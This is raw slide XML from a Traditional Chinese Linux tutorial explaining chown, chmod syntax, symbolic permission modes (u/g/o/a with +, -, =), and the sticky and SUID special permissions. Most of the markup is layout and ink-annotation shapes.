              <a:t>變更</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="34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改變檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>所屬群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71640" y="1517760"/>
              <a:ext cx="654480" cy="320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55800" y="1454040"/>
                <a:ext cx="6861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225440" y="3930480"/>
              <a:ext cx="692640" cy="194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09600" y="3867120"/>
                <a:ext cx="724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387680" y="1523880"/>
              <a:ext cx="711720" cy="957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71840" y="1460520"/>
                <a:ext cx="74340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479760" y="3898800"/>
              <a:ext cx="495720" cy="450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463920" y="3835440"/>
                <a:ext cx="5274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613320" y="3956040"/>
              <a:ext cx="324000" cy="259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597120" y="3892680"/>
                <a:ext cx="3560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977760" y="1523880"/>
              <a:ext cx="14004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61920" y="1460520"/>
                <a:ext cx="1720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882720" y="1530360"/>
              <a:ext cx="1073520" cy="766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66880" y="1467000"/>
                <a:ext cx="110520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1803240" y="565200"/>
              <a:ext cx="5855040" cy="292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787400" y="501480"/>
                <a:ext cx="5887080" cy="41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946080" y="3905280"/>
              <a:ext cx="819720" cy="320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0240" y="3841920"/>
                <a:ext cx="8514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278880" y="3957480"/>
              <a:ext cx="829080" cy="75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263040" y="3894120"/>
                <a:ext cx="86076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3564720" y="2714400"/>
              <a:ext cx="1622160" cy="291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548880" y="2651040"/>
                <a:ext cx="165384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3536280" y="2828880"/>
              <a:ext cx="1578960" cy="360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3520440" y="2765160"/>
                <a:ext cx="16106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3600360" y="2635920"/>
              <a:ext cx="1607760" cy="1004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584520" y="2572560"/>
                <a:ext cx="163944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2886840" y="1619640"/>
              <a:ext cx="725400" cy="331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871000" y="1556280"/>
                <a:ext cx="75708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888480" y="2090160"/>
              <a:ext cx="901440" cy="1980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872280" y="2026440"/>
                <a:ext cx="93348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1508760" y="1606680"/>
              <a:ext cx="340200" cy="266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492920" y="1543320"/>
                <a:ext cx="3718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6006960" y="1568520"/>
              <a:ext cx="2184840" cy="1274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5991120" y="1504800"/>
                <a:ext cx="2216520" cy="254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8274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chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>可改變檔案的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>擁有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>者，也可以修改檔案的所屬</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>群</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>組。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/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t> 帳號</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>名稱 檔案或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>目錄</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/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R:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>進連同次目錄下的所有檔案都變更</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
          </a:p>
          <a:p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改變檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>目錄的所有權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819000" y="1593720"/>
              <a:ext cx="1118160" cy="3240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03160" y="1530360"/>
                <a:ext cx="11498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606840" y="1517760"/>
              <a:ext cx="1644840" cy="1270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591000" y="1454040"/>
                <a:ext cx="167652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346040" y="3943440"/>
              <a:ext cx="2102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30200" y="3879720"/>
                <a:ext cx="2419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228760" y="3943440"/>
              <a:ext cx="6840" cy="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212920" y="3879720"/>
                <a:ext cx="385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415880" y="3740040"/>
              <a:ext cx="5988600" cy="2354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400040" y="3676680"/>
                <a:ext cx="6020280" cy="36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698920" y="1581120"/>
              <a:ext cx="3289320" cy="259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682720" y="1517760"/>
                <a:ext cx="33217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755520" y="2716920"/>
              <a:ext cx="1385280" cy="331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739680" y="2653560"/>
                <a:ext cx="141696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5434200" y="2769480"/>
              <a:ext cx="2266920" cy="52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418360" y="2705760"/>
                <a:ext cx="2298600" cy="17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3610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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>可以更改檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>目錄的權限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>格式：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t> xyz [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>檔案或目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/>
              <a:t>參數</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>-R:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>進連同次目錄下的所有檔案都變更</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
          </a:p>
          <a:p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改變檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>目錄的權限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317520" y="1619280"/>
              <a:ext cx="1740240" cy="446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1680" y="1555920"/>
                <a:ext cx="1771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409760" y="3340080"/>
              <a:ext cx="501840" cy="702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93920" y="3276720"/>
                <a:ext cx="533520" cy="19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311560" y="698400"/>
              <a:ext cx="4502520" cy="146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295360" y="635040"/>
                <a:ext cx="453456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346560" y="1523880"/>
              <a:ext cx="3772080" cy="3434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30720" y="1460520"/>
                <a:ext cx="3803760" cy="47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568680" y="2298600"/>
              <a:ext cx="94644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552840" y="2235240"/>
                <a:ext cx="9781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693240" y="2243160"/>
              <a:ext cx="14760" cy="7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677400" y="2179440"/>
                <a:ext cx="464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4000320" y="2235960"/>
              <a:ext cx="36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984480" y="2172240"/>
                <a:ext cx="324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186080" y="2235960"/>
              <a:ext cx="14760" cy="7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170240" y="2172240"/>
                <a:ext cx="4644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3586320" y="1528560"/>
              <a:ext cx="3593520" cy="36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570120" y="1465200"/>
                <a:ext cx="362556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486240" y="3336120"/>
              <a:ext cx="407520" cy="75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470400" y="3272400"/>
                <a:ext cx="439200" cy="13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4599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3400" dirty="0" smtClean="0"/>
              <a:t>權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>表示法如下</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" alt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符號類型改變檔案權限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0510088"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="931984" y="2348879"/>
          <a:ext cx="7676439" cy="3260613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8281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99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6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9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15061">
                <a:tc rowSpan="6">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>chmod</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3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(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US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擁有者</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW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kumimoji="0" lang="zh-TW" altLang="en-US" sz="3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kumimoji="0" lang="en-US" altLang="zh-TW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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US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加入</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="3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kumimoji="0" lang="zh-TW" altLang="en-US" sz="3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/>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>檔案或目錄</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="30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839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3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>g(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>所屬群組</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3000" b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6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3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>-(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>除去</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3000" b="0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679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3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>o(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>其他用戶</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3000" b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83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3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>=(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>設定</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3000" b="0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8516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3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>a(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>所有用戶</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="0" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3000" b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5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3079800" y="2577960"/>
              <a:ext cx="1155960" cy="1213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63960" y="2514600"/>
                <a:ext cx="118764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筆跡 6"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2959200" y="5022720"/>
              <a:ext cx="1454400" cy="766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43360" y="4959360"/>
                <a:ext cx="148608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筆跡 7"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5060880" y="2577960"/>
              <a:ext cx="127440" cy="13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045040" y="2514600"/>
                <a:ext cx="1591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筆跡 8"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5054760" y="3645000"/>
              <a:ext cx="82800" cy="64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038560" y="3581280"/>
                <a:ext cx="1148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筆跡 9"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5111640" y="4762440"/>
              <a:ext cx="108360" cy="259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095800" y="4699080"/>
                <a:ext cx="1400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筆跡 10"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2914560" y="2593080"/>
              <a:ext cx="1572120" cy="75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898720" y="2529720"/>
                <a:ext cx="160380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筆跡 11"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2871720" y="3400200"/>
              <a:ext cx="1993680" cy="219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855880" y="3336840"/>
                <a:ext cx="202536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筆跡 12"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2864520" y="4171680"/>
              <a:ext cx="182232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848680" y="4108320"/>
                <a:ext cx="185400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2905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LINUX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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作業系統</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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架構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</a:t>
            </a:fld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412776"/>
            <a:ext cx="7183390" cy="3466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44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3000" dirty="0"/>
              <a:t>用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>指令配合文字參數就能改變權限設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>下面舉例說明：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u+rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：為檔案擁有者加入讀取和寫入的權限。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>"g-x"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：將同群組使用者的執行權限取消。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g+x,o+rx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：為同群組使用者加入執行的權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>並為其他使用者加入讀取與執行的權限。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u+rwx,g-w,o-w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：加入檔案或目錄擁有者完整的權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>並且取消同群組與其他使用者的寫入權限。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US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/>
              <a:t>符號類型改變檔案權限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77760" y="2533680"/>
              <a:ext cx="1048320" cy="446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61920" y="2470320"/>
                <a:ext cx="10800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482920" y="2540160"/>
              <a:ext cx="14652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67080" y="2476440"/>
                <a:ext cx="1782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568680" y="2577960"/>
              <a:ext cx="933840" cy="38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552840" y="2514600"/>
                <a:ext cx="9655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768920" y="2552760"/>
              <a:ext cx="1251360" cy="320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53080" y="2489040"/>
                <a:ext cx="12830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6603840" y="2577960"/>
              <a:ext cx="502200" cy="51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588000" y="2514600"/>
                <a:ext cx="53388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7816680" y="2622600"/>
              <a:ext cx="635400" cy="446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800840" y="2558880"/>
                <a:ext cx="66708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914400" y="3156120"/>
              <a:ext cx="438480" cy="129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98560" y="3092400"/>
                <a:ext cx="4701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565360" y="3143160"/>
              <a:ext cx="844920" cy="13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549520" y="3079800"/>
                <a:ext cx="8766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118120" y="3130560"/>
              <a:ext cx="2184840" cy="702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102280" y="3067200"/>
                <a:ext cx="2216520" cy="19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123920" y="3714840"/>
              <a:ext cx="5760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108080" y="3651120"/>
                <a:ext cx="892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6480" y="3676680"/>
              <a:ext cx="1632240" cy="68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-9360" y="3613320"/>
                <a:ext cx="16639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720800" y="3670200"/>
              <a:ext cx="203760" cy="320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704960" y="3606840"/>
                <a:ext cx="2354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120760" y="3670200"/>
              <a:ext cx="121320" cy="3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104920" y="3606840"/>
                <a:ext cx="1530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2394000" y="3689280"/>
              <a:ext cx="89280" cy="129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378160" y="3625920"/>
                <a:ext cx="1209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3587760" y="3657600"/>
              <a:ext cx="1238760" cy="7668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571920" y="3594240"/>
                <a:ext cx="127044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5823000" y="3664080"/>
              <a:ext cx="781200" cy="129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807160" y="3600360"/>
                <a:ext cx="8132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7626240" y="3676680"/>
              <a:ext cx="730800" cy="5760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610400" y="3613320"/>
                <a:ext cx="7624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6546960" y="3701880"/>
              <a:ext cx="355680" cy="36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531120" y="3638520"/>
                <a:ext cx="3877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1778040" y="4133880"/>
              <a:ext cx="1422720" cy="5112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762200" y="4070520"/>
                <a:ext cx="145440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4375080" y="4146480"/>
              <a:ext cx="584640" cy="684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359240" y="4083120"/>
                <a:ext cx="616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5619600" y="4184640"/>
              <a:ext cx="286200" cy="684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603760" y="4121280"/>
                <a:ext cx="3178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4559400" y="4102200"/>
              <a:ext cx="216000" cy="5112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4543560" y="4038480"/>
                <a:ext cx="2480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5511960" y="4172040"/>
              <a:ext cx="565200" cy="36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495760" y="4108320"/>
                <a:ext cx="5976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8" name="筆跡 27"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6718320" y="4146480"/>
              <a:ext cx="343080" cy="3852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6702480" y="4083120"/>
                <a:ext cx="37512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9" name="筆跡 28"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="990720" y="4540320"/>
              <a:ext cx="3225960" cy="8280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974880" y="4476600"/>
                <a:ext cx="3257640" cy="21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0" name="筆跡 29"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4203720" y="4540320"/>
              <a:ext cx="1962360" cy="133560"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="30" name="筆跡 29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4187880" y="4476600"/>
                <a:ext cx="1994040" cy="26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筆跡 30"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="844560" y="5067360"/>
              <a:ext cx="4515120" cy="381240"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="31" name="筆跡 30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828720" y="5003640"/>
                <a:ext cx="4546800" cy="50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2" name="筆跡 31"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="-82440" y="1054080"/>
              <a:ext cx="838440" cy="952920"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="32" name="筆跡 31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-98280" y="990720"/>
                <a:ext cx="870120" cy="107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432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000" dirty="0"/>
              <a:t>"o=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>rx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：設定其他使用者具有讀取和執行的權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>而沒有寫入權限。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ugo+x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>或 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>a+x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：同時為擁有者、同群組、其他使用者加入執行權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>, "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>ugo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>可以合稱為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>"a"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>"+x"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>ugo+x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>a+x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>的意義相同</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>沒有指定 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>或 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>時</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>即代表全部。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o+t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：加入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>Sticky </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>特殊權限。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>u+s,g+s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：加入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>SUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
